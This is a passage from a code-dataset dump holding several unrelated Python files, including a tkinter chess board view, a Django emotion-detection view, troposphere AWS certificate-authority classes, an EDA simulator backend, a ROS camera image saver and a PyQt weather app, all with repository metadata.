board.pieces\n for (x, y) in pieces.keys():\n self.piece_images[x, y] = tkinter.PhotoImage(file=pieces[x, y].get_image_file_name())\n self.can.create_image(board_coord(x), board_coord(y), image=self.piece_images[x, y])\n if board.selected_piece:\n for (x, y) in board.selected_piece.get_move_locs(board):\n self.move_images.append(tkinter.PhotoImage(file=\"images/OOS.gif\"))\n self.can.create_image(board_coord(x), board_coord(y), image=self.move_images[-1])\n # self.can.create_text(board_coord(x), board_coord(y),text=\"Hello\")\n\n # label = tkinter.Label(self.root, text='Hello world!')\n # label.place(x=30,y=30)\n # label.pack(fill='x', expand=1)\n\n def disp_hint_on_board(self, action, percentage):\n board = self.board\n for key in board.pieces.keys():\n board.pieces[key].selected = False\n board.selected_piece = None\n\n self.can.create_image(0, 0, image=self.img, anchor=tkinter.NW)\n self.draw_board(board)\n # self.can.create_text(board_coord(self.last_text_x), board_coord(self.last_text_y), text=\"\")\n x_trans = {'a': 0, 'b': 1, 'c': 2, 'd': 3, 'e': 4, 'f': 5, 'g': 6, 'h': 7, 'i': 8}\n\n src = action[0:2]\n dst = action[2:4]\n\n src_x = int(x_trans[src[0]])\n src_y = int(src[1])\n\n dst_x = int(x_trans[dst[0]])\n dst_y = int(dst[1])\n\n pieces = board.pieces\n if (src_x, src_y) in pieces.keys():\n self.piece_images[src_x, src_y] = tkinter.PhotoImage(file=pieces[src_x, src_y].get_selected_image())\n self.can.create_image(board_coord(src_x), board_coord(src_y), image=self.piece_images[src_x, src_y])\n\n if (dst_x, dst_y) in pieces.keys():\n self.piece_images[dst_x, dst_y] = tkinter.PhotoImage(file=pieces[dst_x, dst_y].get_selected_image())\n self.can.create_image(board_coord(dst_x), board_coord(dst_y), image=self.piece_images[dst_x, dst_y])\n self.can.create_text(board_coord(dst_x), board_coord(dst_y), text=\"{:.3f}\".format(percentage))\n self.last_text_x = dst_x\n self.last_text_y = dst_y\n else:\n self.move_images.append(tkinter.PhotoImage(file=\"images/OOS.gif\"))\n self.can.create_image(board_coord(dst_x), board_coord(dst_y), image=self.move_images[-1])\n self.can.create_text(board_coord(dst_x), board_coord(dst_y),text=\"{:.3f}\".format(percentage))\n self.last_text_x = dst_x\n self.last_text_y = dst_y\n self.print_text_flag = True\n # return (src_x, src_y, dst_x - src_x, dst_y - src_y), win_rate\n\n def print_all_hint(self, sorted_move_probs):\n\n # for i in range(len(sorted_move_probs)):\n # self.lb.insert(END, str(i * 100))\n\n self.lb.delete(0, \"end\")\n for item in sorted_move_probs:\n # print(item[0], item[1])\n self.lb.insert(\"end\", item)\n self.lb.pack()\n\n def showMsg(self, msg):\n print(msg)\n self.root.title(msg)\n\n def printList(self, event):\n # print(self.lb.curselection())\n # print(self.lb.get(self.lb.curselection()))\n # for i in range(self.lb.size()):\n # print(i, self.lb.selection_includes(i))\n w = event.widget\n index = int(w.curselection()[0])\n value = w.get(index)\n print(value)\n self.disp_hint_on_board(value[0], value[1])\n\n\n def __init__(self, control, board):\n self.control = control\n if self.control.game_mode != 2:\n self.can.bind('', self.control.callback)\n\n self.lb = tkinter.Listbox(ChessView.root,selectmode=\"browse\")\n self.scr1 = tkinter.Scrollbar(ChessView.root)\n self.lb.configure(yscrollcommand=self.scr1.set)\n self.scr1['command'] = self.lb.yview\n self.scr1.pack(side='right',fill=\"y\")\n self.lb.pack(fill=\"x\")\n\n self.lb.bind('<>', self.printList) # Double- \n self.board = board\n self.last_text_x = 0\n self.last_text_y = 0\n self.print_text_flag = False\n\n # def start(self):\n # tkinter.mainloop()\n def start(self):\n if self.control.game_mode == 2:\n self.root.update()\n time.sleep(self.control.delay)\n while True:\n game_end = self.control.game_mode_2()\n self.root.update()\n time.sleep(self.control.delay)\n if game_end:\n time.sleep(self.control.end_delay)\n self.quit()\n return\n else:\n tkinter.mainloop()\n # self.root.mainloop()\n\n # below added by Fei Li\n\n def quit(self):\n self.root.quit()\n","repo_name":"chengstone/cchess-zero","sub_path":"ChessView.py","file_name":"ChessView.py","file_ext":"py","file_size_in_byte":5346,"program_lang":"python","lang":"en","doc_type":"code","stars":435,"dataset":"github-code","pt":"19"} +{"seq_id":"4251639506","text":"from django.shortcuts import render\nfrom django.core.files.storage import FileSystemStorage\nimport os\nfrom .emotion_detection import *\nfrom django.conf import settings\n# Create your views here.\n\nvgg16Loaded = loadModel(\"vgg16_end\")\nvgg19Loaded = loadModel(\"vgg19_end\")\nresNetLoaded = loadModel(\"resNet_end\")\nconv2DLoaded = loadModel(\"conv2D_end\")\n\n\n \ndef index(request):\n\n \n if request.method == \"POST\" and request.FILES['myfile']:\n myfile = request.FILES['myfile']\n fs = FileSystemStorage()\n filename = fs.save(myfile.name, myfile)\n uploaded_file_url = fs.url(filename)\n img = \"detectEmotion/images/happy.png\"\n resizedImage = resizeImage(settings.MEDIA_ROOT + \"/\" + filename)\n \n \n \n vgg16Result = predictOnImage(vgg16Loaded,resizedImage)\n vgg19Result = predictOnImage(vgg19Loaded,resizedImage)\n resNetResult = predictOnImage(resNetLoaded,resizedImage)\n conv2DResult = predictOnImage(conv2DLoaded,resizedImage)\n emotions = [\"neutral\", \"anger\",\"contempt\", \"disgust\",\"fear\",\"happiness\",\"sadness\",\"surprise\"]\n\n vgg16zip = zip(emotions,vgg16Result)\n vgg19zip = zip(emotions,vgg19Result)\n resNetzip = zip(emotions,resNetResult)\n ourModelzip = zip(emotions,conv2DResult)\n \n context = {'uploaded_file_url': uploaded_file_url, 'vgg16': vgg16zip,\"vgg19\": vgg19zip, \"resNet\": resNetzip,\"conv2D\": ourModelzip}\n \n return render(request, 'detectEmotion/show_emotion.html',context) \n \n clear_media_folder()\n \n return render(request, 'detectEmotion/index.html')\n\n\ndef show_emotion(request):\n return render(request, 'detectEmotion/show_emotion.html')\n\n\n\ndef clear_media_folder():\n folder = \"media/\"\n for f in os.listdir(folder):\n file_path = os.path.join(folder,f)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n except Exception as e:\n print(e)\n","repo_name":"mpreyes/emotion_research_frontend","sub_path":"detectEmotion/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21694694264","text":"from . import AWSObject, AWSProperty, Tags\nfrom .validators import (boolean, integer)\n\nVALID_SIGNIN_ALGORITHM = ('SHA256WITHECDSA', 'SHA256WITHRSA',\n 'SHA384WITHECDSA', 'SHA384WITHRSA',\n 'SHA512WITHECDSA', 'SHA512WITHRSA')\nVALID_VALIDITY_TYPE = ('ABSOLUTE', 'DAYS', 'END_DATE',\n 'MONTHS', 'YEARS')\nVALID_KEY_ALGORITHM = ('EC_prime256v1', 'EC_secp384r1',\n 'RSA_2048', 'RSA_4096')\nVALID_CERTIFICATEAUTHORITY_TYPE = ('ROOT', 'SUBORDINATE')\n\n\ndef validate_validity_type(validity_type):\n \"\"\"Certificate Validity Type validation rule.\"\"\"\n if validity_type not in VALID_VALIDITY_TYPE:\n raise ValueError(\"Certificate Validity Type must be one of: %s\" %\n \", \".join(VALID_VALIDITY_TYPE))\n return validity_type\n\n\ndef validate_signing_algorithm(signing_algorithm):\n \"\"\"Certificate SigningAlgorithm validation rule.\"\"\"\n if signing_algorithm not in VALID_SIGNIN_ALGORITHM:\n raise ValueError(\"Certificate SigningAlgorithm must be one of: %s\" %\n \", \".join(VALID_SIGNIN_ALGORITHM))\n return signing_algorithm\n\n\ndef validate_key_algorithm(key_algorithm):\n \"\"\"CertificateAuthority KeyAlgorithm validation rule.\"\"\"\n if key_algorithm not in VALID_KEY_ALGORITHM:\n raise ValueError(\"CertificateAuthority KeyAlgorithm must be one of: %s\" % # NOQA\n \", \".join(VALID_KEY_ALGORITHM))\n return key_algorithm\n\n\ndef validate_certificateauthority_type(certificateauthority_type):\n \"\"\"CertificateAuthority Type validation rule.\"\"\"\n if certificateauthority_type not in VALID_CERTIFICATEAUTHORITY_TYPE:\n raise ValueError(\"CertificateAuthority Type must be one of: %s\" %\n \", \".join(VALID_CERTIFICATEAUTHORITY_TYPE))\n return certificateauthority_type\n\n\nclass Qualifier(AWSProperty):\n props = {\n 'CpsUri': (str, True),\n }\n\n\nclass PolicyQualifierInfo(AWSProperty):\n props = {\n 'PolicyQualifierId': (str, True),\n 'Qualifier': (Qualifier, True),\n }\n\n\nclass PolicyQualifierInfoList(AWSProperty):\n props = {\n 'PolicyQualifierInfoList': ([PolicyQualifierInfo], False),\n }\n\n\nclass PolicyInformation(AWSProperty):\n props = {\n 'CertPolicyId': (str, True),\n 'PolicyQualifiers': (PolicyQualifierInfoList, False),\n }\n\n\nclass CertificatePolicyList(AWSProperty):\n props = {\n 'CertificatePolicyList': ([PolicyInformation], False),\n }\n\n\nclass ExtendedKeyUsage(AWSProperty):\n props = {\n 'ExtendedKeyUsageObjectIdentifier': (str, False),\n 'ExtendedKeyUsageType': (str, False),\n }\n\n\nclass ExtendedKeyUsageList(AWSProperty):\n props = {\n 'ExtendedKeyUsageList': ([ExtendedKeyUsage], False),\n }\n\n\nclass EdiPartyName(AWSProperty):\n props = {\n 'NameAssigner': (str, True),\n 'PartyName': (str, True),\n }\n\n\nclass OtherName(AWSProperty):\n props = {\n 'TypeId': (str, True),\n 'Value': (str, True),\n }\n\n\nclass Subject(AWSProperty):\n props = {\n 'CommonName': (str, False),\n 'Country': (str, False),\n 'DistinguishedNameQualifier': (str, False),\n 'GenerationQualifier': (str, False),\n 'GivenName': (str, False),\n 'Initials': (str, False),\n 'Locality': (str, False),\n 'Organization': (str, False),\n 'OrganizationalUnit': (str, False),\n 'Pseudonym': (str, False),\n 'SerialNumber': (str, False),\n 'State': (str, False),\n 'Surname': (str, False),\n 'Title': (str, False),\n }\n\n\nclass GeneralName(AWSProperty):\n props = {\n 'DirectoryName': (Subject, False),\n 'DnsName': (str, False),\n 'EdiPartyName': (EdiPartyName, False),\n 'IpAddress': (str, False),\n 'OtherName': (OtherName, False),\n 'RegisteredId': (str, False),\n 'Rfc822Name': (str, False),\n 'UniformResourceIdentifier': (str, False),\n }\n\n\nclass GeneralNameList(AWSProperty):\n props = {\n 'GeneralNameList': ([GeneralName], False),\n }\n\n\nclass KeyUsage(AWSProperty):\n props = {\n 'CRLSign': (boolean, False),\n 'DataEncipherment': (boolean, False),\n 'DecipherOnly': (boolean, False),\n 'DigitalSignature': (boolean, False),\n 'EncipherOnly': (boolean, False),\n 'KeyAgreement': (boolean, False),\n 'KeyCertSign': (boolean, False),\n 'KeyEncipherment': (boolean, False),\n 'NonRepudiation': (boolean, False),\n }\n\n\nclass Extensions(AWSProperty):\n props = {\n 'CertificatePolicies': (CertificatePolicyList, False),\n 'ExtendedKeyUsage': (ExtendedKeyUsageList, False),\n 'KeyUsage': (KeyUsage, False),\n 'SubjectAlternativeNames': (GeneralNameList, False),\n }\n\n\nclass ApiPassthrough(AWSProperty):\n props = {\n 'Extensions': (Extensions, False),\n 'Subject': (Subject, False),\n }\n\n\nclass Validity(AWSProperty):\n props = {\n 'Type': (validate_validity_type, True),\n 'Value': (integer, True),\n }\n\n\nclass Certificate(AWSObject):\n resource_type = \"AWS::ACMPCA::Certificate\"\n\n props = {\n 'ApiPassthrough': (ApiPassthrough, False),\n 'CertificateAuthorityArn': (str, True),\n 'CertificateSigningRequest': (str, True),\n 'SigningAlgorithm': (validate_signing_algorithm, True),\n 'TemplateArn': (str, False),\n 'Validity': (Validity, True),\n 'ValidityNotBefore': (Validity, False),\n }\n\n\nclass CertificateAuthorityActivation(AWSObject):\n resource_type = \"AWS::ACMPCA::CertificateAuthorityActivation\"\n\n props = {\n 'Certificate': (str, True),\n 'CertificateAuthorityArn': (str, True),\n 'CertificateChain': (str, False),\n 'Status': (str, False),\n }\n\n\nclass CrlConfiguration(AWSProperty):\n props = {\n 'CustomCname': (str, False),\n 'Enabled': (boolean, False),\n 'ExpirationInDays': (integer, False),\n 'S3BucketName': (str, False),\n }\n\n\nclass RevocationConfiguration(AWSProperty):\n props = {\n 'CrlConfiguration': (CrlConfiguration, False)\n }\n\n\nclass Subject(AWSProperty):\n props = {\n 'CommonName': (str, False),\n 'Country': (str, False),\n 'DistinguishedNameQualifier': (str, False),\n 'GenerationQualifier': (str, False),\n 'GivenName': (str, False),\n 'Initials': (str, False),\n 'Locality': (str, False),\n 'Organization': (str, False),\n 'OrganizationalUnit': (str, False),\n 'Pseudonym': (str, False),\n 'SerialNumber': (str, False),\n 'State': (str, False),\n 'Surname': (str, False),\n 'Title': (str, False),\n }\n\n\nclass CertificateAuthority(AWSObject):\n resource_type = \"AWS::ACMPCA::CertificateAuthority\"\n\n props = {\n 'KeyAlgorithm': (validate_key_algorithm, True),\n 'RevocationConfiguration': (RevocationConfiguration, False),\n 'SigningAlgorithm': (validate_signing_algorithm, True),\n 'Subject': (Subject, True),\n 'Tags': (Tags, False),\n 'Type': (validate_certificateauthority_type, True),\n }\n","repo_name":"suzhe96/ECE1779-Winter2021","sub_path":"insta/venv/lib/python3.8/site-packages/troposphere/acmpca.py","file_name":"acmpca.py","file_ext":"py","file_size_in_byte":7148,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"26095101336","text":"import os\nimport logging\n\nfrom edalize.edatool import Edatool\n\nlogger = logging.getLogger(__name__)\n\n\nclass Vcs(Edatool):\n\n _description = \"\"\" Synopsys VCS Backend\n\nVCS is one of the \"Big 3\" simulators.\n\nExample snippet of a CAPI2 description file for VCS:\n\n.. code:: yaml\n\n vcs:\n vcs_options:\n # Compile-time options passed to the vcs command\n - -debug_access+pp\n - -debug_access+all\n run_options:\n # Run-time options passed to the simulation itself\n - -licqueue\n\"\"\"\n\n tool_options = {\n \"lists\": {\n \"vcs_options\": \"String\", # compile-time options (passed to VCS)\n \"run_options\": \"String\", # runtime options (passed to simulation)\n }\n }\n\n argtypes = [\"plusarg\", \"vlogdefine\", \"vlogparam\"]\n\n def _filelist_has_filetype(self, file_list, string, match_type=\"prefix\"):\n for f in file_list:\n if match_type == \"prefix\" and f.file_type.startswith(string):\n return True\n elif match_type == \"exact\" and f.file_type == string:\n return True\n return False\n\n def configure_main(self):\n def _vcs_filelist_filter(src_file):\n ft = src_file.file_type\n # XXX: C source files can be passed to VCS to be compiled into DPI\n # libraries; passing C sources together with RTL sources is a\n # workaround until we have proper DPI support\n # (https://github.com/olofk/fusesoc/issues/311).\n return (\n ft.startswith(\"verilogSource\")\n or ft.startswith(\"systemVerilogSource\")\n or ft == \"cSource\"\n or ft == \"cppSource\"\n )\n\n self._write_fileset_to_f_file(\n os.path.join(self.work_root, self.name + \".scr\"),\n include_vlogparams=True,\n filter_func=_vcs_filelist_filter,\n )\n\n plusargs = []\n if self.plusarg:\n for key, value in self.plusarg.items():\n plusarg = \"+\" + key\n if value != True:\n plusarg += \"=\" + self._param_value_str(value)\n plusargs.append(plusarg)\n\n vcs_options = self.tool_options.get(\"vcs_options\", [])\n\n (src_files, incdirs) = self._get_fileset_files(force_slash=True)\n if self._filelist_has_filetype(src_files, \"systemVerilog\", match_type=\"prefix\"):\n vcs_options.append(\"-sverilog\")\n\n if self._filelist_has_filetype(src_files, \"verilog2001\", match_type=\"exact\"):\n vcs_options.append(\"+v2k\")\n\n template_vars = {\n \"name\": self.name,\n \"vcs_options\": vcs_options,\n \"run_options\": self.tool_options.get(\"run_options\", []),\n \"toplevel\": self.toplevel,\n \"plusargs\": plusargs,\n }\n\n self.render_template(\"Makefile.j2\", \"Makefile\", template_vars)\n\n def run_main(self):\n args = [\"run\"]\n\n # Set plusargs\n if self.plusarg:\n plusargs = []\n for key, value in self.plusarg.items():\n plusargs += [\"+{}={}\".format(key, self._param_value_str(value))]\n args.append(\"EXTRA_OPTIONS=\" + \" \".join(plusargs))\n\n self._run_tool(\"make\", args)\n","repo_name":"olofk/edalize","sub_path":"edalize/vcs.py","file_name":"vcs.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":553,"dataset":"github-code","pt":"19"} +{"seq_id":"20304596898","text":"from pathlib import Path\n\nimport pytest\nfrom hamcrest import *\n\nfrom ilids.cli.mdb import export_all_tables, mdb_export_table\n\n\n@pytest.mark.sztr_files((\"SZTR.mdb\", \"mdb_file\"))\n@pytest.mark.parametrize(\n \"table,entries,columns\",\n [\n (\"CLIPDATA\", 3894, 5),\n (\"CLIPS\", 236, 5),\n (\"DATASTRUCTURE\", 19, 5),\n (\"LIBRARIES\", 1, 4),\n ],\n)\ndef test_export_table(mdb_file: Path, table, entries, columns):\n table_data = mdb_export_table(mdb_file, table)\n assert_that(len(table_data), is_(entries))\n assert_that(len(table_data.columns), is_(columns))\n\n\n@pytest.mark.sztr_files((\"SZTR.mdb\", \"mdb_file\"))\ndef test_export_all_tables(mdb_file: Path):\n tables_df = export_all_tables(mdb_file)\n assert_that(\n tables_df.keys(),\n contains_inanyorder(\"CLIPDATA\", \"CLIPS\", \"DATASTRUCTURE\", \"LIBRARIES\"),\n )\n","repo_name":"schallerala/unifr-master-ilids-alarms","sub_path":"tests/cli/test_mdb.py","file_name":"test_mdb.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7334807628","text":"#!/usr/bin/env python3\nimport sys\nsys.path.insert(0, '/opt/installer/open_cv/cv_bridge/lib/python3/dist-packages/')\nsys.path.insert(1, '/usr/local/lib/python3.6/dist-packages/cv2')\nimport os\nimport datetime \nimport cv2\nimport rospy\nimport time \nimport argparse\nimport numpy as np\n\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--Object_Name', type=str, default='My_Object', help='Class name of training object.')\nFLAGS = parser.parse_args()\n\nday = str(datetime.datetime.now()).split(\" \")[0]\ntime = str(datetime.datetime.now()).split(\" \")[1]\ntime = time.split(\":\")[0] + \"_\" + time.split(\":\")[1] + \"_\" + time.split(\":\")[2].split(\".\")[0]\n\ncurrent_time = day + \"_\" + time + \"_\"\n\nObject_Name = FLAGS.Object_Name\n\nTrain_Data_Dir = os.path.dirname(os.path.realpath(__file__)) + '/Training_Data/' + \\\n current_time + '_' + Object_Name + '/'\n\nvis = True\n\nrgb_brdige = CvBridge()\ndepth_brdige = CvBridge()\nrgb_image = np.zeros((0,0,3), np.float32)\ndepth_image = np.zeros((0,0,1), np.float32)\ntemp_depth_img = np.zeros((0,0,1), np.float32)\n\ndef rgb_callback(Image):\n global rgb_image\n try:\n rgb_image = rgb_brdige.imgmsg_to_cv2(Image, \"bgr8\")\n except CvBridgeError as e:\n print(e)\n\ndef depth_callback(Image):\n global depth_image\n try:\n temp_depth_img = depth_brdige.imgmsg_to_cv2(Image, desired_encoding=\"passthrough\")\n except CvBridgeError as e:\n print(e)\n\n temp_depth_img = np.array(temp_depth_img, dtype=np.float32)\n \n cv2.normalize(temp_depth_img, temp_depth_img, 0, 1, cv2.NORM_MINMAX)\n\n depth_image = temp_depth_img.copy()\n \n\nif __name__ == '__main__':\n\n rospy.init_node('get_image_cornell', anonymous=True)\n\n rospy.Subscriber(\"/camera/color/image_raw\", Image, rgb_callback)\n rospy.Subscriber(\"/camera/aligned_depth_to_color/image_raw\", Image, depth_callback)\n\n take_picture_counter = 0\n\n while not rospy.is_shutdown():\n\n if rgb_image.shape != (0, 0, 3) and depth_image.shape != (0, 0, 1):\n\n if vis:\n cv2.namedWindow(\"rgb_result\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"rgb_result\", rgb_image)\n cv2.waitKey(1)\n\n cv2.namedWindow(\"depth_result\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"depth_result\", depth_image)\n cv2.waitKey(1)\n\n if cv2.waitKey(33) & 0xFF == ord('s'):\n\n if not os.path.exists(Train_Data_Dir):\n os.makedirs(Train_Data_Dir)\n \n print(\"============================\")\n \n objct_number = \"9\"\n\n if take_picture_counter<10:\n serial_number = objct_number + \"10\" + str(take_picture_counter)\n\n elif take_picture_counter<100:\n serial_number = objct_number +\"1\" + str(take_picture_counter)\n\n else:\n serial_number = objct_number + str(take_picture_counter+100)\n print(\"take_picture_counter \", take_picture_counter)\n \n rgb_name = str(Train_Data_Dir + \"pcd\" + serial_number + \"r\" + \".png\")\n cv2.imwrite(rgb_name, rgb_image)\n print(\"[Save] \", rgb_name)\n\n depth_name = str(Train_Data_Dir + \"pcd\" + serial_number + \"d\" + \".png\")\n #相机采集的深度图是 32 位的浮点数。经bridge.imgmsg_to_cv2(msg, '32FC1')转换得到是以米为单位的深度数值。\n #而cv2.imwrite()写入的则是 0-255 的数值,因此深度值都被取整了,导致直接保存的图片全黑了\n cv2.imwrite(depth_name, depth_image*255)\n print(\"[Save] \", depth_name)\n\n #save .tiff\n depth_name_tiff = str(Train_Data_Dir + \"pcd\" + serial_number + \"d\" + \".tiff\")\n cv2.imwrite(depth_name_tiff, depth_image)\n print(\"[Save] \", depth_name_tiff)\n\n print(\"============================\")\n\n take_picture_counter += 1\n \n else:\n pass\n\n cv2.destroyAllWindows()","repo_name":"SamKaiYang/grcnn_rgb","sub_path":"get_image/script/get_image_cornell.py","file_name":"get_image_cornell.py","file_ext":"py","file_size_in_byte":4217,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"71408291940","text":"from weatherwindow import WeatherWindow, WeatherDataManager\r\nfrom PyQt6.QtCore import Qt\r\nfrom PyQt6.QtGui import QFont\r\nfrom PyQt6.QtWidgets import ( \r\n QMainWindow, \r\n QVBoxLayout,\r\n QPushButton,\r\n QWidget,\r\n QLabel,\r\n QLineEdit,\r\n QSizePolicy,\r\n QSpacerItem,\r\n QMessageBox,\r\n)\r\n\r\n\r\nclass MainWindow(QMainWindow):\r\n \"\"\"\r\n Main window of the WeatherApp.\r\n\r\n Attributes\r\n ----------\r\n city_line_edit : QLineEdit\r\n Line edit for entering the city name.\r\n\r\n Methods\r\n -------\r\n __init__()\r\n Initialize the MainWindow.\r\n open_weather_window() -> WeatherWindow\r\n Open the WeatherWindow with weather information for the entered city.\r\n\r\n \"\"\"\r\n \r\n def __init__(self) -> None:\r\n \"\"\"\r\n Initialize the MainWindow.\r\n\r\n Returns\r\n -------\r\n None\r\n\r\n \"\"\"\r\n \r\n super().__init__()\r\n self.setWindowTitle(\"WeatherApp\")\r\n\r\n # MainWindow elements:\r\n font = QFont()\r\n font.setPointSize(20)\r\n font.setBold(True)\r\n title_label = QLabel(\"WEATHER\")\r\n title_label.setFont(font)\r\n title_label.setAlignment(Qt.AlignmentFlag.AlignCenter)\r\n self.city_line_edit = QLineEdit()\r\n\r\n city_label = QLabel(\"Enter a city:\")\r\n self.weather_button = QPushButton(\"View weather\")\r\n self.weather_button.clicked.connect(self.open_weather_window)\r\n\r\n # Layout.\r\n layout = QVBoxLayout()\r\n spacer_top = QSpacerItem(20, 40, QSizePolicy.Policy.Minimum, \r\n QSizePolicy.Policy.Expanding)\r\n layout.addItem(spacer_top)\r\n layout.addWidget(title_label)\r\n layout.addWidget(city_label)\r\n layout.addWidget(self.city_line_edit)\r\n layout.addWidget(self.weather_button)\r\n spacer_bottom = QSpacerItem(20, 40, QSizePolicy.Policy.Minimum, \r\n QSizePolicy.Policy.Expanding)\r\n layout.addItem(spacer_bottom)\r\n layout.setAlignment(Qt.AlignmentFlag.AlignCenter)\r\n\r\n widget = QWidget()\r\n widget.setLayout(layout)\r\n self.setCentralWidget(widget)\r\n\r\n\r\n def open_weather_window(self) -> None:\r\n \"\"\"\r\n Open the WeatherWindow with weather information for the entered city.\r\n\r\n Returns\r\n -------\r\n None\r\n\r\n \"\"\"\r\n city = self.city_line_edit.text()\r\n if not WeatherDataManager.is_valid_city(city):\r\n QMessageBox.critical(self, \"Error\", \"The city name is not valid.\")\r\n return\r\n\r\n WeatherDataManager.save_info(city)\r\n self.weather_window = WeatherWindow(city)\r\n self.city_line_edit.clear()\r\n self.weather_window.show()\r\n self.weather_window.exec()\r\n","repo_name":"PabloGradolph/WeatherApp","sub_path":"src/weather/mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"18619720812","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport pandas as pd\ndf = pd.read_csv('new.csv', encoding = 'cp1251', delimiter=';', index_col=False)\n\nbrands = df['Бренд'].unique()\n\nfor brand in brands:\n file_name = brand + \".csv\"\n new_files = df[df['Бренд']==brand]\n new_files.to_csv(file_name, index=False, encoding='cp1251')\n\n\n","repo_name":"alex-qwerty/csv_split","sub_path":"Csv_read.py","file_name":"Csv_read.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"18265003838","text":"\"\"\"Tests area codes\"\"\"\n\nimport pytest\n\n\ndef test_url():\n from covid.data import AreaCodeData\n\n config = {\n \"AreaCodeData\": {\n \"input\": \"json\",\n \"address\": \"https://services1.arcgis.com/ESMARspQHYMw9BZ9/arcgis/rest/services/LAD_APR_2019_UK_NC/FeatureServer/0/query?where=1%3D1&outFields=LAD19CD,FID&returnGeometry=false&returnDistinctValues=true&orderByFields=LAD19CD&outSR=4326&f=json\",\n \"format\": \"ons\",\n \"output\": \"processed_data/processed_lad19cd.csv\",\n \"regions\": [\"E\"],\n },\n }\n\n df = AreaCodeData.process(config)\n\n print(df)\n","repo_name":"chrism0dwk/covid19uk","sub_path":"covid19uk/data/area_code_test.py","file_name":"area_code_test.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"35"} +{"seq_id":"70080411300","text":"first_side=int(input())\nsecond_side=int(input())\nthird_side=int(input())\n\ncondition_1=((first_side + second_side) > third_side)\ncondition_2=((second_side + third_side) > first_side)\ncondition_3=((third_side + first_side) > second_side)\n\nif (condition_1 and condition_2) and condition_3:\n print(\"It's a Triangle\")\nelse:\n print(\"It's not a Triangle\")","repo_name":"BhavanDevOps/Full-Stack-Projects","sub_path":"Python Projects/Valid Triangle - 2.py","file_name":"Valid Triangle - 2.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"39739222851","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport copy\n\ndef sens_plots(ffc_data, rh_data):\n # Averge each FFC metric across the POR.\n for model in ffc_data:\n model['ffc_metrics'] = model['ffc_metrics'].apply(pd.to_numeric, errors='coerce')\n model['ffc_metrics'] = model['ffc_metrics'].mean(axis=1)\n \n # Normalize metric values across all models. \n ffc_data_norm = copy.deepcopy(ffc_data)\n metrics = ffc_data[0]['ffc_metrics'].index\n for metric in metrics:\n max_metric = ffc_data[0]['ffc_metrics'][metric] # can pick any starting val in dataset and test all others against it for min/max\n min_metric = ffc_data[0]['ffc_metrics'][metric] \n for model in ffc_data_norm:\n if model['ffc_metrics'][metric] is None:\n continue\n elif model['ffc_metrics'][metric] > max_metric:\n max_metric = model['ffc_metrics'][metric]\n elif model['ffc_metrics'][metric] < min_metric:\n min_metric = model['ffc_metrics'][metric]\n \n for index, model in enumerate(ffc_data_norm):\n ffc_data_norm[index]['ffc_metrics'][metric] = (model['ffc_metrics'][metric] - min_metric)/(max_metric - min_metric)\n # Group together all values for each metric (across models)\n dT_min = []\n dT_mid = []\n dT_min_names = ['SACSMA_DT1_DP1_DI0.0', 'SACSMA_DT2_DP1_DI0.0', 'SACSMA_DT3_DP1_DI0.0', 'SACSMA_DT4_DP1_DI0.0', 'SACSMA_DT5_DP1_DI0.0']\n dT_mid_names = ['SACSMA_DT1_DP1.1_DI0.6', 'SACSMA_DT2_DP1.1_DI0.6', 'SACSMA_DT3_DP1.1_DI0.6', 'SACSMA_DT4_DP1.1_DI0.6', 'SACSMA_DT5_DP1.1_DI0.6']\n for model_index, model in enumerate(ffc_data_norm):\n if model['gage_id'] in dT_min_names:\n dT_min.append(ffc_data[model_index])\n elif model['gage_id'] in dT_mid_names:\n dT_mid.append(ffc_data[model_index])\n \n # Plot: a line for each ffc metric, low PI dT (20 lines, 6 pts each)\n fig, ax = plt.subplots()\n # start with low PI dT (all blue lines)\n # for each metric, form a line from the six models\n for metric in metrics:\n line = []\n for model in dT_min:\n line.append(model['ffc_metrics'][metric])\n x = range(len(line))\n ax.scatter(x, line, color='orange', alpha=0.5)\n z = np.polyfit(x, line, 1)\n p = np.poly1d(z)\n plt.plot(x, p(x),'-', color='orange')\n\n line_mid = []\n for model in dT_mid:\n line_mid.append(model['ffc_metrics'][metric])\n x = range(len(line_mid))\n ax.scatter(x, line_mid, color='blue', alpha=0.5)\n z = np.polyfit(x, line_mid, 1)\n p = np.poly1d(z)\n plt.plot(x, p(x),'-', color='blue')\n # plt.show()\n\n # Create summary table of extreme ends of sensitivity analysis\n sens_summary = {}\n # sens_summary_names = ['SACSMA_DT0_DP1_DI0.0', 'SACSMA_DT5_DP1_DI0.0', 'SACSMA_DT0_DP1.3_DI0.0', 'SACSMA_DT0_DP1_DI1.0'] # models at far ends of sensitivity\n sens_summary_names = ['SACSMA_DT0_DP1_DI0.0', 'SACSMA_DT1_DP0.8_DI0.2', 'SACSMA_DT2_DP0.9_DI0.4', 'SACSMA_DT3_DP1.1_DI0.6', 'SACSMA_DT4_DP1.2_DI0.8', \n 'SACSMA_DT5_DP1.3_DI1.0'] # step-wise combination models\n for model_index, model in enumerate(ffc_data):\n if model['gage_id'] in sens_summary_names:\n 